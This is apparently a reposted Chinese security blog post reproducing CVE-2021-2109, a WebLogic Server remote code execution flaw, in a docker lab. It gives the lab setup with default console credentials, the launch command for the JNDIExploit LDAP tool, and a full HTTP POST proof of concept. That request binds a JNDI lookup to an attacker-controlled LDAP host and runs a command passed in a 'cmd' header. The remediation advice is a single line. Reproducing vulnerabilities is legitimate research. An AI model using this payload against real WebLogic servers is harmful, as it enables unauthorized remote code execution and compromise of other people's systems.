Weblogic Server远程代码执行(CVE-2021-2109 )复现

admin 2021年4月30日09:36:58评论96 views字数 1096阅读3分39秒阅读模式

影响版本


WebLogic 10.3.6.0.0WebLogic 12.1.3.0.0WebLogic 12.2.1.3.0WebLogic 12.2.1.4.0WebLogic 14.1.1.0.0


环境搭建

 

这里使用docker来搭建环境

docker pull ismaleiva90/weblogic12


Weblogic Server远程代码执行(CVE-2021-2109 )复现

docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest

Weblogic Server远程代码执行(CVE-2021-2109 )复现

访问http://your-ip:49163/console即可看到页面

Weblogic Server远程代码执行(CVE-2021-2109 )复现

User: weblogicPass: welcome1


登陆进去

Weblogic Server远程代码执行(CVE-2021-2109 )复现


漏洞复现

 

启动LDAP

下载地址:

https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11


java -jar JNDIExploit-v1.11.jar -i 192.168.204.131


Weblogic Server远程代码执行(CVE-2021-2109 )复现

POC:

POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.204;131:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.204.131:49163
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
cmd:id
Cookie: ADMINCONSOLESESSION=nM8lXW3nshhqyFuWs47qjIiQP0tUMtRYRHbBUFDXA8QIxRpdyNqr!964275826
Upgrade-Insecure-Requests: 1

构建数据包并发送

Weblogic Server远程代码执行(CVE-2021-2109 )复现

成功执行命令

 

修复建议

 

升级到安全版本


本文始发于微信公众号(锋刃科技):Weblogic Server远程代码执行(CVE-2021-2109 )复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月30日09:36:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Weblogic Server远程代码执行(CVE-2021-2109 )复现https://cn-sec.com/archives/250075.html

发表评论

匿名网友 填写信息